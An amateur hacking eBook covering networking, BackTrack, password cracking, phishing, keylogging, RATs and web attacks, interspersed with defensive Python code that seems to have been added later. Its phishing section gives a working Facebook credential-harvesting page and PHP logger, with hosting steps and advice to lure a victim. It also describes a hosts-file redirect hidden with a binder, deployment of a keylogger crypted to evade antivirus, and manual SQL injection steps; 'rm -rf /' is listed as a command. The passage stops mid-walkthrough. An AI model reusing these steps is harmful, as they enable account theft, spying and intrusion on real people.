root@localhost:~# “what they keep secret we expose” By Ubaid (aka) $cr1pt Kid33
Copyright Notice
Any unauthorized use, distribution or reproduction without the permission of the author is strictly prohibited.

Liability Disclaimer
The information provided in this eBook is to be used for educational purposes only. The eBook creator is in no way responsible for any misuse of the information provided. All of the information in this eBook is meant to help the reader develop a hacker-defence attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage, directly or indirectly. The words “Hack” and “Hacking” in this eBook should be read as “Ethical Hack” and “Ethical hacking” respectively. You implement the information given at your own risk.
Contents
Introduction
  What is ethical hacking
  Who is a hacker
  Types of hackers
  Who can use this book
NETWORKING
  a) Concept of networking
  b) Basics about TCP & UDP
Programming
  Do I really need it?
  Where should I start?
Backtrack
  What is it?
  Installing & Running Backtrack
    1) Clean hard drive install
    2) Dual-boot installation
    3) USB installation
  Basic Linux Commands
Password Hacking
  Password Cracking
    1) Brute force
    2) Dictionary-based attack
    3) Rainbow tables
  Phishing
    1) Demo (How crackers hack your Facebook account using phishing)
  Desktop phishing
  Social Engineering
  Keylogging
    Demo: How to hack using Ardamax Keylogger
  RAT (Remote Access Trojan)
  Malware
Web Hacking
  Footprinting
  Port Scanning
  SQL Injection
  Authentication Bypass
  XSS
  CSRF
  Buffer Overflow
  RFI
  LFI
  Open Redirection
About
Introduction

What is ethical hacking
Ethical hacking is the process of finding vulnerabilities in a computer system, using programming or non-programming skills (just like rooting an Apple device without any software), & then exploiting these vulnerabilities.

Who is a hacker
A hacker is someone who uses his computer knowledge to find vulnerabilities in computer systems & then exploits them for any reason, including patriotism, malicious purposes, or some personal problem with the owner of that system.
Types of hackers
There are basically three types of hackers:
1) Grey Hat: A combination of Black Hat & White Hat. They sometimes work defensively & sometimes offensively.
2) White Hat: Their sole purpose is to test websites, individually or for a company, & report the vulnerabilities to them.
3) Black Hat: They break system security for malicious purposes, including identity theft, credit card theft, destruction of data etc.
Other than these there are also some other types:
1. Elite Hackers: Highly skilled hackers who are good programmers as well. They create new exploits & also help in cyber security awareness.
2. Script Kiddies: Non-experts who usually hack using programs created by others, but they rank higher than Neophytes.
3. Neophyte: The newbies or n00bs who don’t know anything about hacking & other techniques.
4. Blue Hat: A person outside a security company or firm who tests the security or bug vulnerabilities of their apps.
5. Hacktivists: A hacktivist is a hacker who breaks into a system to announce a social, political or religious message.
Who can use this book
Anybody who is interested in cyber security, including students, administrators, webmasters, analysts, engineers, blah blah; in fact everybody who is connected to the internet can use its content to get some awareness about the latest cyber attacks.
NETWORKING

a) Concept of networking
Networking is the process of connecting two or more computers in order to communicate & share resources such as printers, data etc.

a) LAN: A Local Area Network (LAN) is a network that is confined to a relatively small area. It is generally limited to a geographic area such as a writing lab, school, or building.
b) WAN: Wide Area Networks (WANs) connect networks in larger geographic areas, such as Kashmir, the Palestine, or the world. Dedicated transoceanic cabling or satellite uplinks may be used to connect this type of global network.
c) MAN: A Wide Area Network or WAN is a type of networking where a number of resources are installed across a large area, such as a multinational business. Through a WAN, offices in different countries can be interconnected. The best example of a WAN could be the Internet, the largest network in the world. In a WAN, computer systems on different sites can be linked.
d) Peer to Peer (P2P): A peer-to-peer (abbreviated to P2P) computer network is one in which each computer in the network can act as a client or server for the other computers in the network, allowing shared access to various resources such as files, peripherals, and sensors without the need for a central server.

b) Basics about TCP & UDP

Transmission Control Protocol
• It is a connection-oriented protocol
• Message delivery is guaranteed
• Data arrives in order
• Packets are sent as a stream
• There is retransmission of packets
• It is slower because of its extensive error checking
• Examples include HTTP, SMTP, FTP, SSH

User Datagram Protocol
• It is a connectionless protocol
• Message delivery isn’t guaranteed
• There is no order in data arriving
• Packets are sent individually
• There is no retransmission of packets
• It allows only basic error checking, making it faster than TCP but less robust
• Examples include DNS, VoIP, SNMP, BOOTP
Programming

Do I really need it?
To become a good hacker you should possess good programming skills. It’s the only way you will create your own exploits & tools, which will help you a lot on your way to becoming a good hacker.
“Eat, Drink & code, Or your system will overload” – Microsoft (Hack Marathon)

Where should I start?
The most important question every newbie asks. The easiest way is to start reading books, clear the basics, then go into advanced topics; & importantly, take references from programmers.

Type           Description                                                   E.g.
Compiled       Those which are processed by a compiler                       C, C++, C#, Visual Basic, Visual FoxPro etc.
Multiparadigm  They allow a program to use more than one programming style   PHP, Python, Perl etc.

1) Always take languages which are easy to understand.
2) Try to make your own programs as soon as possible.
3) Look at your code & try to understand every example: how & what these codes do, why we need them & blah blah.
4) Learn how to use a debugger.
5) If you are not able to understand, clear your ideas on various online forums like Stack Overflow.
6) All languages are almost the same; the only difference is the syntax. That’s why you should take only the language which you think you can understand, so that it will be easy for you to understand other languages too.
7) Keep Coding, Coding & Coding.
Backtrack

What is it?
BackTrack is a distribution based on the Debian GNU/Linux distribution, aimed at digital forensics and penetration testing use. The current version is BackTrack 5 R3. It consists of many tools. BackTrack arranges tools into 12 categories:
• Information gathering
• Vulnerability assessment
• Exploitation tools
• Privilege escalation
• Maintaining access
• Reverse engineering
• RFID tools
• Stress testing
• Forensics
• Reporting tools
• Services
• Miscellaneous

Some of the well known security tools which it includes are:
• Metasploit for integration
• RFMON injection capable wireless drivers
• Aircrack-ng
• Kismet
• Nmap
• Ophcrack
• Ettercap
• Wireshark (formerly known as Ethereal)

Download it here
2. Installing & Running Backtrack
There are 4 ways by which you can install BackTrack, depending on your needs:
i. Clean hard drive install: the whole drive is used for BackTrack.
ii. Dual boot installation: your system already has a Windows OS taking up all the space on your hard drive; you resize or partition the drive to install a dual OS, i.e. Windows + BackTrack.
iii. USB installation: installing BackTrack, either clean hard drive or dual boot, from a USB drive instead of a DVD.

1) Clean hard drive install
Boot BackTrack on the machine to be installed. Once booted, type in “startx” to get to the KDE graphical interface. Double click the “install.sh” script on the desktop, or run the command “ubiquity” in a console.
Select your geographical location and click “Forward”. Do the same for the keyboard layout.
The next screen allows you to configure the partitioning layout. The assumption is that we are deleting the whole drive and installing BackTrack on it. Accept the installation summary and click “Install”. Allow the installation to run & complete.
Restart when done. Log into BackTrack with the default username and password root / toor. Change the root password. Fix the framebuffer splash by typing “fix-splash” (or “fix-splash800” if you wish an 800×600 framebuffer), then reboot.

2) Dual-boot installation
Boot BackTrack on the machine to be installed. Once booted, type in “startx” to get to the KDE graphical interface. Double click the “install.sh” script on the desktop, or run the command “ubiquity” in a console. Select your geographical location and click “Forward”. Do the same for the keyboard layout. The next screen allows you to configure the partitioning layout. The assumption is that we are resizing the Windows 7 partition and installing BackTrack in the newly made space. GRUB should allow you to boot both into BackTrack and Windows.
Log into BackTrack with the default username and password root / toor. Change the root password. Fix the framebuffer splash by typing “fix-splash” (or “fix-splash800” if you wish an 800×600 framebuffer), reboot. Accept the installation summary and click “Install”. Allow the installation to run and complete. Restart when done.

3) USB installation
• Plug in your USB drive (minimum USB drive capacity 2 GB).
• Format the USB drive to FAT32.
• Download UNetbootin from http://unetbootin.sourceforge.net/
• Start UNetbootin and select Diskimage (use your BackTrack ISO).
• Select your USB drive and click “OK” to create a bootable BackTrack USB drive.
• Log into BackTrack with the default username and password root / toor.
Basic Linux Commands
startx: Start the GUI in BackTrack
halt: Shutdown
sleep: Sleep
reboot: Restart
cd: Change directory
ls -la: List a directory
mv $folder $newfolder: Change the name of a directory
pwd: Print working directory
find / -name love: Find a file named love, searching from the root directory
rm -r: Remove an existing directory
cp: Copy files
killall program: Kill all processes of a program
ps aux: Show running processes
ifconfig: The Linux equivalent of ipconfig
gcc in_file -o out_file: Compile C files
sudo: Run a command with super user rights
ping host: Sends an echo request via TCP/IP to the specified host
id: Show which user you are logged in as
cat /etc/passwd: Show the account list
uname -r: Show release info
uname -a: Show kernel version
dpkg -l: Get a list of all the installed programs
last -30: Show logs of the last 30 IPs
useradd: Add a user account
usermod: Modify a user account
w: Show logged-in users
locate password.txt: Show the location of password.txt in the current directory
rm -rf /: Remove everything
chmod ### $folder: Change the permissions of a folder
lsmod: Dump kernel modules
dmesg: Check hardware info

For beginners there are a lot of websites which teach Linux for free; check out http://www.beginlinux.org/ or just google it.
Password Hacking
The process of stealing a password or credentials from the legitimate user is called password hacking. There are many ways by which we can get the password of a device, email, router, account blah blah.

Password Cracking
The process by which we get a password by trying a range of characters or predefined words is called password cracking. Passwords can be cracked in the following ways:
a) Brute force attack
b) Dictionary-based attack
c) Rainbow tables

1) Brute Force
Brute force is a technique used by an application program to decode any encrypted data (encoded using an algorithm). What a brute force program actually does is take all possible combinations of legal characters, i.e. alphabets (both uppercase & lowercase), numbers & symbols, & try them one by one. If the password length is 4 & it contains only lowercase alphabets & no special characters or numbers, the brute force will go like this: “a”, “aa”, “aaa”, “aaaa”, “aaab”, “aaac” blah blah. These programs can attempt many strings per minute. Strongly encrypted data (consisting of alphabets both uppercase & lowercase, numbers, & special characters i.e. symbols) can take many days to get decrypted. These programs can overcome any encrypted data (password/hash). Some of the commonly used programs are Cain & Abel, Brutus, John The Ripper etc. BackTrack contains many brute force tools.

2) Dictionary-based attack
In this technique a program uses an English dictionary to decrypt an encrypted cipher. The program tries all possible legal words contained in a dictionary to decrypt a password/hash, known as a cipher. Cain & Abel, Brutus, John The Ripper are some of the tools used to launch a dictionary-based attack.

3) Rainbow tables
Rainbow tables are a large database of precomputed ciphers together with the actual plaintext from which they were calculated. Rainbow table generators are the tools which take all possible combinations of legal characters, calculate their hash using your desired algorithm & store them in a large database. Common cryptographic algorithms used in CMSs are:

Cryptographic Hash   Length                 Note
MD5                  128 bits               32 char hexadecimal
MD5 Salted           128 bits : Any Length  Contains two blocks, 32 char hex : random
SHA1                 160 bits               40 char hexadecimal
SHA256               256 bits               64 char hexadecimal
MySQL 5              164 bits               41 char, all characters capital, starts with asterisk *
MD5 (WordPress)      136 bits               34 char, starts with $P$, variable-case alphanumeric
MD5 (phpBB3)         136 bits               34 char, starts with $H$, variable-case alphanumeric
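The recognisers in the table above are enough to audit a dump of stored password hashes and flag which ones a rainbow table or brute force attack would hit cheaply. This is an added example, not from the eBook; the sample rows are constructed, the "hex:salt" layout for salted MD5 is an assumption that matches the table's note, and the verdict rules (salt defeats precomputation, iteration slows brute force) are the usual ones.

```python
import hashlib
import re

# Recognisers derived from the table above: label, pattern over the stored string,
# whether the format carries a per-user salt, and whether it iterates the hash.
# A salt defeats precomputed (rainbow) tables; iteration slows brute force.
# The two phpass formats ($P$ / $H$) are salted and iterated; the other formats
# in the table are a single, fast digest. The "hex:salt" layout for MD5 salted
# is an assumption matching the table's "32 char hex : random" note.
HASH_FORMATS = [
    ("MD5",             re.compile(r"^[0-9a-f]{32}$", re.I),         False, False),
    ("MD5 salted",      re.compile(r"^[0-9a-f]{32}:[^\s:]+$", re.I), True,  False),
    ("SHA1",            re.compile(r"^[0-9a-f]{40}$", re.I),         False, False),
    ("SHA256",          re.compile(r"^[0-9a-f]{64}$", re.I),         False, False),
    ("MySQL 5",         re.compile(r"^\*[0-9A-F]{40}$"),             False, False),
    ("MD5 (WordPress)", re.compile(r"^\$P\$[./0-9A-Za-z]{31}$"),     True,  True),
    ("MD5 (phpBB3)",    re.compile(r"^\$H\$[./0-9A-Za-z]{31}$"),     True,  True),
]


def identify_hash(stored):
    """Return (label, salted, iterated) for a stored hash string, or None if unknown."""
    for label, pattern, salted, iterated in HASH_FORMATS:
        if pattern.match(stored):
            return label, salted, iterated
    return None


def audit_hashes(rows):
    """rows: iterable of (username, stored_hash). Returns (username, label, verdict) tuples."""
    findings = []
    for user, stored in rows:
        ident = identify_hash(stored)
        if ident is None:
            findings.append((user, "unknown", "cannot classify; inspect manually"))
            continue
        label, salted, iterated = ident
        if not salted:
            verdict = "weak: unsalted fast hash, rainbow tables apply directly"
        elif not iterated:
            verdict = "moderate: salted (no precomputation) but a single fast hash"
        else:
            verdict = "better: salted and iterated, brute force is slowed"
        findings.append((user, label, verdict))
    return findings


def mysql5_hash(password):
    """MySQL 5 PASSWORD(): '*' + uppercase hex of SHA1(SHA1(password)), 41 chars."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


# Constructed sample rows (not from any real system). The digests are computed here
# so they are genuine; the two phpass strings are hand-made to fit the format only.
SAMPLE_ROWS = [
    ("alice", hashlib.md5(b"password").hexdigest()),
    ("bob",   hashlib.sha1(b"letmein").hexdigest()),
    ("carol", hashlib.sha256(b"qwerty").hexdigest()),
    ("dave",  mysql5_hash("admin123")),
    ("erin",  hashlib.md5(b"s4lt" + b"password").hexdigest() + ":s4lt"),
    ("frank", "$P$BabcdefghABCDEFGHIJKLMNOPQRSTUV"),
    ("grace", "$H$9abcdefghABCDEFGHIJKLMNOPQRSTUV"),
    ("heidi", "not-a-hash"),
]

if __name__ == "__main__":
    for user, label, verdict in audit_hashes(SAMPLE_ROWS):
        print(f"{user:6} {label:16} {verdict}")
```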
Phishing
Phishing is the most common way to acquire personal information such as usernames, passwords, email ids, credit card info, etc. If you are too lazy to inspect some basic info, like looking at the URL while clicking on any link, then you will soon lose access to your accounts. Here is a demo of how to hack into any account using phishing.

1) Demo (How crackers hack your Facebook account using phishing)
1. Go to facebook.com.
2. Right click anywhere on the page & click on “View page source”.
3. Copy all the source code into Notepad or any editor.
4. Inspect the source code & find “action=” as shown in the figure. Change “action=https://www.facebook.com/login.php?login_attempt=1” to “action=next.php” & method=”post” to method=”get”, & save the whole page as anything, say hello.php.
5. Now open a new page in Notepad & write the following code into it:

    <?php
    // send the browser on to the real login page
    header("Location: https://login.facebook.com/login.php");
    // append every submitted form field to passes.txt
    $handle = fopen("passes.txt", "a");
    foreach ($_GET as $variable => $value) {
        fwrite($handle, $variable);
        fwrite($handle, "=");
        fwrite($handle, $value);
        fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>

   & save it as next.php in the same directory. I will not go deep into what these lines do.
6. Now again open a new page in Notepad & save it as passes.txt (keep the page blank).
7. Create a hosting account at any free hosting website, say bytehost, & get your domain, say XXXXXX.bytehost.com.
8. Now open your dashboard & click on File Manager. Under File Manager click on public_html.
9. Upload all three files to the public_html folder.
10. Now your URLs will be like this:
    XXXXXX.bytehost.com/index.php
    XXXXXX.bytehost.com/next.php
    XXXXXX.bytehost.com/passes.txt
11. Give your URL XXXXXX.bytehost.com/index.php to your victim & try to convince him to log in with his credentials. (I am kidding, don’t try to pwn anyone, it’s only for educational purposes.) In the image I logged in with username=aa & password=aa.
12. When anybody logs in to that website with his email id & password, the credentials will be saved at XXXXXX.bytehost.com/passes.txt & he will be redirected to the real Facebook login page.

Whoo, you have got the credentials of your victim. This tutorial is only for educational purposes, & will make you aware of how hackers hack into your profiles by phishing.
How to prevent yourself from being a victim of phishing
The best way to prevent phishing is to always double check (if your eyesight is weak :P lol) the URL of the Facebook website & always use a secure connection, “https://” instead of “http://”, i.e. https://www.facebook.com. Hackers always use domain names similar to facebook, like facebok, facebuk, face-bok blah blah.
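The two checks above (is it https, is the host really the site you think it is) can be written down so they are applied the same way every time. This is an added example, not from the eBook: the legitimate host list and the brand label "facebook" are assumptions, the lookalike rule is plain edit distance over the second-level label, and it also covers two tricks the text does not spell out, the brand name hidden in a subdomain and the user@host form of a URL.

```python
from urllib.parse import urlsplit

# Assumptions for this example: the protected site is facebook.com, its brand
# label is "facebook", and these are the only hosts where a login page is
# legitimate. Substitute the sites your users actually sign in to.
BRAND = "facebook"
LEGITIMATE_HOSTS = {"facebook.com", "www.facebook.com", "login.facebook.com"}


def edit_distance(a, b):
    """Levenshtein distance: catches one- or two-character misspellings such as facebok."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def check_login_url(url):
    """Return (ok, reason). ok is True only for an https URL on a legitimate host."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if parts.scheme != "https":
        return False, "not https: credentials would travel in clear text"
    if parts.username is not None:
        # https://www.facebook.com@evil.example/ : the text before @ is a username,
        # the browser actually connects to evil.example
        return False, f"user@host trick: the real host is {host}"
    if host in LEGITIMATE_HOSTS:
        return True, "legitimate host"
    labels = host.split(".")
    if BRAND in labels[:-2]:
        # facebook.com.login-secure.example: the brand is only a subdomain label
        return False, f"brand name buried in a subdomain of {'.'.join(labels[-2:])}"
    second_level = labels[-2] if len(labels) >= 2 else host
    if second_level != BRAND and edit_distance(second_level.replace("-", ""), BRAND) <= 2:
        # facebok, facebuk, face-bok: within two edits of the real name
        return False, f"lookalike domain {host}"
    return False, f"unrecognised host {host}"


if __name__ == "__main__":
    for sample in ("https://www.facebook.com/login.php",
                   "http://www.facebook.com/login.php",
                   "https://www.facebok.com/login.php",
                   "https://www.face-bok.com/",
                   "https://www.facebook.com.login-secure.example/index.php",
                   "https://www.facebook.com@evil.example/"):
        print(check_login_url(sample), sample)
```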
Desktop phishing
The hosts file is a system file used by the operating system to map hostnames to their IP addresses. On Windows it is in %windir%\System32\drivers\etc.
Things you need:
1. A static IP, or you can use a VPN which assigns you a static IP, like Strong Open VPN (Download It Here).
2. A webserver: WAMP or XAMPP.
3. Facebook phisher (already built in the simple phishing tutorial above).
4. Desktop phishing script.
5. A binder; google them.
Install WAMP & the VPN. Now copy the phishing files, i.e. hello.html, next.php & passes.txt, to the root directory of your webserver; for WAMP it is %installation directory%/wamp/www.
Now open Notepad & enter this desktop phishing script:
Replace 0.1.2.3 in the desktop phishing script with the IP address you got from the VPN (to check your IP address go to http://cmyip.com) & save the file as anything.bat. This file could look suspicious to the person you are sending it to through email or another data transfer medium, so we will bind it with another file using a binder. Google them; you will find loads of binders out there.
After the victim executes your .bat file his hosts file gets an entry something like this:
& whenever he enters www.facebook.com he will be redirected to your IP address hosting the phisher.
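Because the redirection lives in a plain text file, it is easy to check for. This is an added example, not from the eBook: it parses hosts-file content and reports any entry that pins a public login site (the watched list is an assumption), telling a loopback "block" apart from a redirect to another address. The sample hosts content is constructed.

```python
import ipaddress
import os

# Public login sites that an ordinary workstation's hosts file should never pin
# (assumption for this example; extend with the sites your users log into).
WATCHED_HOSTS = {"facebook.com", "www.facebook.com", "login.facebook.com"}


def default_hosts_path():
    """%windir%\\System32\\drivers\\etc\\hosts on Windows, /etc/hosts elsewhere."""
    if os.name == "nt":
        windir = os.environ.get("windir", r"C:\Windows")
        return os.path.join(windir, "System32", "drivers", "etc", "hosts")
    return "/etc/hosts"


def parse_hosts(text):
    """Return (ip_address, hostname) pairs, ignoring comments, blanks and malformed lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue
        for name in fields[1:]:
            entries.append((addr, name.lower()))
    return entries


def suspicious_entries(text, watched=WATCHED_HOSTS):
    """Return (hostname, ip, kind) for every watched hostname pinned in the hosts file.

    A loopback address merely blocks the site; anything else silently sends the
    browser to that address, which is what the .bat file described above sets up.
    """
    findings = []
    for addr, name in parse_hosts(text):
        if name in watched:
            kind = "blocked (loopback)" if addr.is_loopback else f"redirected to {addr}"
            findings.append((name, str(addr), kind))
    return findings


def audit_hosts_file(path=None):
    """Read the machine's real hosts file and return its suspicious entries."""
    with open(path or default_hosts_path(), encoding="utf-8", errors="replace") as fh:
        return suspicious_entries(fh.read())


# Constructed sample: a normal hosts file plus the two lines a desktop phishing
# script would append (0.1.2.3 stands in for the attacker's address).
SAMPLE_HOSTS = """\
# sample hosts file (constructed)
127.0.0.1       localhost
::1             localhost
0.1.2.3 www.facebook.com
0.1.2.3 facebook.com
"""

if __name__ == "__main__":
    for name, ip, kind in suspicious_entries(SAMPLE_HOSTS):
        print(f"{name:20} {ip:12} {kind}")
```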
Social Engineering
It’s one of the biggest threats to our privacy. It’s an act by which an attacker manipulates the minds of people so that they give their confidential information to the attacker. They usually trick people by reading their body language. The biggest scams, like fake lotteries, money transfers etc, are the result of social engineering. It plays a vital role in any type of phishing. It is the biggest threat to companies: the attackers usually trick employees of the company, resulting in the theft of financial/confidential information. An attacker usually calls or emails people, tells them he is from customer care/support & asks them some personal questions like their name, D.O.B, residence, email id, password, & usually most people give their personal information, including their password, thinking that they are getting that call/email from a legitimate source. After collecting some information they get access to your secret information/accounts. And Bang! The victim gets social engineered.
Keylogging
Keylogging is the method of tracking the keys struck on a keyboard. It can be done in two ways, either using a software keylogger or a hardware keylogger. Both these keyloggers store the keys struck on the keyboard in memory in the form of logs. Later these logs can be sent to the email id or the FTP of the attacker.
Software Keylogger: They usually consist of two files, i.e. a “.dll” & an “.exe” file. The .exe file executes the dll file & makes the keylogger work. They are bound & encrypted, making it hard for an anti-virus to find any evidence. They usually work in stealth mode, making it even harder for the victim to find them. They have many features like:
1. They work in stealth mode.
2. They capture screenshots.
3. They include a remote deploy wizard.
4. Registry entries are hidden.
5. They track websites visited.
6. They track applications used.
7. They capture HTTP POST operations.
8. They capture video of the victim using the webcam.
9. They record surrounding sound using a connected microphone.
10. Logs can be exported as txt or html.
11. User friendly interface.
12. They can track your location.
13. Automatic delivery of logs after an interval set by the attacker.
14. They capture chat logs.
15. Password authentication.
Demo: How to hack using Ardamax Keylogger
1. Buy Ardamax Keylogger from their site, or just google it if you don’t want to spend money. You will get a pro version with the remote deployment wizard. Install the setup. Now register your keylogger.
2. After registering, click on Remote Installation.
3. Click Next until you reach the Security dialog; click on Enable & set a password. After that click on Next. Now you will get the Options dialog; here set your magic keys. Click Next. Now comes the first part of the Control section: select the method & time interval through which you want to receive the logs, as shown in image “4”. Click Next. Now comes the heart of this tutorial; if you make some mistakes here your keylogger will not work. Enter the details as shown in image “5”. Click Next. After clicking Next you will get another Control dialog as shown in image “6”. Keep your desired settings here & click Next. Note: keep your anti-virus disabled.
4. Keep clicking Next until you get the Destination dialog. Select your path, change the icon & click Next until the wizard completes & you get a successful build message.
5. After building you need to crypt it so that it will not get detected by anti-virus. Download any good FUD (Fully UnDetectable) crypter (google it), which will crypt your keylogger so it can bypass anti-virus. Note: this file will get detected by most anti-virus, so keep your anti-virus disabled until you make your keylogger.
6. Now share your keylogger through your social engineering talent :P :D
RAT (Remote Access Trojan)
It is a type of Trojan which is used to take control over the victim’s machine. Once installed it can do whatever an attacker wishes: create files & folders, open the CD drive, play popups, use your files, upload & download files on your machine. After installing on your machine an attacker can do all these things remotely:
1. Create, open & delete files & folders.
2. Format the complete hard disk.
3. Install malicious programs.
4. Overload your memory, RAM or ROM.
5. Use your system for malicious purposes like DDoS.
6. Hide files & folders.
7. Control your peripherals & start or kill your processes.
8. Record music & video.
9. Steal passwords.
10. Print rich contents & view your screen.
Some of the commonly used RATs are Cybergate, DarkComet, LAN filtrator, Spy-Net.
Malware
Malware is a piece of script or software which is used to destroy/disable computers, gather sensitive data, gain access to private networks, create backdoors or interrupt a private computer network. It includes worms, Trojans, adware, spyware, rootkits & viruses. In short, when we combine all types of computer threats they are known as malware. It is usually used to spy on foreign networks, government organizations, or corporate sectors. It can be a piece of script, software or active content. It usually copies itself from one network to another using removable disks. It is distributed through social networking sites, file sharing websites, or infected websites. Once the file is installed on your device it connects to the internet & downloads its other modules.
Web Hacking
Website hacking is the process of penetrating a web application by exploiting a vulnerability in it. Below are some of the techniques used by attackers.

Footprinting
This is the first step of ethical hacking. Before a pen tester goes deep, the most important thing is to gather some information about the machine. It includes checking open ports, whois, nslookup etc.
a) Open Ports: Firstly we need to know what networking ports are. A port is a specific software endpoint, for either an application or a process, on a computer’s host operating system. E.g. port 80 = HTTP, 21 = FTP, 443 = SSL. To find the open ports on an end user system we have many tools available; the most widely used tool is Nmap, which helps us detect ports on a remote system. There are also many online websites which help you find the open ports on a remote system, like yougetsignal, canyouseeme, t1shopper etc.
b) Banner Grabbing: After finding the open ports comes banner grabbing. It is the technique by which an attacker can get some really important information about the services running on the remote system, like operating system, service application version, developer etc. You can get this information simply using telnet. Open a command prompt & enter the command as shown in the image, replacing google.com with your website. After entering it you will get some information like this:
After getting the banner information an attacker finds exploits for the services running on that remote host. Commonly used exploit databases are exploit-db, 1337day, Metasploit, security vulns.
c) Other than these methods an attacker can use various other techniques to dig up information from various online sources, like whois. It is the method by which an attacker can get information about the organization or individual that registered the domain name, like name, address, email etc. Commonly used websites for whois lookups are whois.net, whois.com, who.is, Network Solutions.
d) Nslookup: It is the technique to get information about the name servers of a domain & map DNS records. It comes pre-installed with the Windows OS. To get information about a domain, open a command prompt & enter “nslookup anyurl.com”. Or you can use online services for nslookup, like Network-tools.
e) Tracert: It is another important tool; it allows an attacker to find the route & delay time to the remote host, using the simple command “tracert yoururl.ext”, e.g. tracert yahoo.com.
Port Scanning
Port scanning is one of the important aspects of ethical hacking. We can scan ports both with & without using software. One of the best tools for scanning ports is Nmap. For Windows, download the GUI of Nmap, called Zenmap, from their official website. For Linux users, open a terminal & type “sudo apt-get install nmap” (without quotes). It comes preloaded with BackTrack Linux.
For Windows: after installing, open zenmap.exe; the GUI of Nmap will open in front of you. Enter the URL in the URL field & choose your profile depending upon your needs.
Since these tools leave a bunch of traces, including your IP address, it can sometimes create a problem for the person scanning a remote host. Therefore it is better to use an alternative, & most people prefer to do all the things using a website without installing such software on their machine. Here I have got an alternative, ScanPlanner: it is a website which detects many useful things on a remote host, including ports, OS, remote services/versions. Go to ScanPlanner, enter your URL in the input box, select the appropriate check boxes & click on Run Scan.
Besides ScanPlanner there is another site known as yougetsignal which allows us to find much useful information about a website, including ports, reverse IP, network location etc.
SQL Injection
Before SQL injection we have to know about SQL. SQL, or Structured Query Language, as the name implies is a programming language responsible for updating, deleting & requesting information from database management systems. SQL injection is a flaw in an application which exploits a bug that can allow an attacker to get sensitive information from the database. It is one of the deadliest hacking techniques used by attackers. It is caused by the vulnerability that arises when user input is not filtered properly & is allowed to execute as an SQL statement in the application’s database. The attacker inserts an SQL command (query) into the entry form or any input field, which gets executed in the database application, enabling the attacker to manipulate the database. A successful SQL injection can enable an attacker to read data from the database or write data into the database.

Key concepts of SQL injection
• User input is directly sent to the database interpreter as an SQL query without filtering the input.
• The attacker tricks the interpreter by using various special SQL queries.
• Using SQL queries an attacker can do whatever he wants, e.g. delete, read, write, update data etc.
• With an SQL injection vulnerability an attacker can deface the website.
• Upload malicious files & thus get access to the whole server & execute remote code on the host operating system.

Demo:
    String SQLQuery = "SELECT Username, Password FROM users WHERE username='" + txtUsername.text + "' AND Password='" + txtPassword.text + "'";
If an attacker inserts ' or '1'='1 as both username & password, the query becomes:
    SELECT Username, Password FROM users WHERE username='' or '1'='1' AND Password='' or '1'='1'
As we know one is always equal to one, so it will log the attacker in as a user & return data from the database, allowing an unauthorised user to view sensitive data. Later an attacker can edit, update, or delete from the database.
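The demo query, run for real against a throwaway SQLite table, next to the fix the text implies (bound parameters, so the quote in the input is data rather than SQL). This is an added example, not from the eBook; the table and its single row are constructed, and plaintext storage is kept only because the demo's query compares plaintext.

```python
import sqlite3


def make_db():
    """In-memory SQLite table shaped like the `users` table in the demo query.

    Constructed sample data. Real systems must store password hashes, never
    plaintext; the demo's query compares plaintext, so this mirrors that.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (Username TEXT, Password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The concatenated query from the text: user input becomes part of the SQL."""
    sql_query = ("SELECT Username, Password FROM users WHERE username='" + username +
                 "' AND Password='" + password + "'")
    return conn.execute(sql_query).fetchall()


def login_safe(conn, username, password):
    """Same query with bound parameters: the driver passes the values separately,
    so quotes in the input are compared as characters, never parsed as SQL."""
    sql_query = "SELECT Username, Password FROM users WHERE username=? AND Password=?"
    return conn.execute(sql_query, (username, password)).fetchall()


INJECTION = "' or '1'='1"   # the payload from the text, used for both fields


def compare(payload=INJECTION):
    """Return (rows from the vulnerable query, rows from the safe query) for one payload."""
    conn = make_db()
    return login_vulnerable(conn, payload, payload), login_safe(conn, payload, payload)


if __name__ == "__main__":
    vuln, safe = compare()
    # vulnerable: [('alice', 's3cret')]  (logged in without knowing any password)
    # safe:       []                     (the payload is just an unknown username)
    print("vulnerable query returned:", vuln)
    print("parameterised query returned:", safe)
```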
Testing for SQL injection vulnerability

The easiest way is to append a single quote (') to the value of a parameter:

http://vulnerablesite.tld/index.php?id=test'

If you get an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line ...", or if you notice that something went missing from the page (a picture, some text etc.), or the page takes a long time to load after adding the single quote, then that website is vulnerable. Sometimes you will get a more generic response from the server, like HTTP status code 500, which means the SQL statement was invalid.
Manual SQL Injection Demo (from xedlgubaid.blogspot.com)

1) Check for vulnerability

Let's say that we have a site like this:

http://www.site.com/news.php?id=5

Now to test if it is vulnerable we add a quote ('), so the URL becomes

http://www.site.com/news.php?id=5'

If we get an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right ..." or something similar, as discussed above under Testing for SQL injection vulnerability, the site is vulnerable.

2) Find the number of columns

To find the number of columns we use the ORDER BY statement. We keep incrementing the number until we get an error.

http://www.site.com/news.php?id=5 order by 1/*   <- no error
http://www.site.com/news.php?id=5 order by 2/*   <- no error
http://www.site.com/news.php?id=5 order by 3/*   <- no error
http://www.site.com/news.php?id=5 order by 4/*   <- error (we get a message like "Unknown column '4' in 'order clause'" or something like that)

That means it has 3 columns, because we got an error on 4.

3) Check for UNION

With UNION we can select more data in one SQL statement. So we have

http://www.site.com/news.php?id=5 union all select 1,2,3/*

(we already found in step 2 that the number of columns is 3). If we see some numbers on the screen, i.e. 1, 2 or 3, then UNION works.

NOTE: if /* is not working or you get some error, then try -- instead. It is a comment, and it is important for our query to work properly.

4) Check for MySQL version

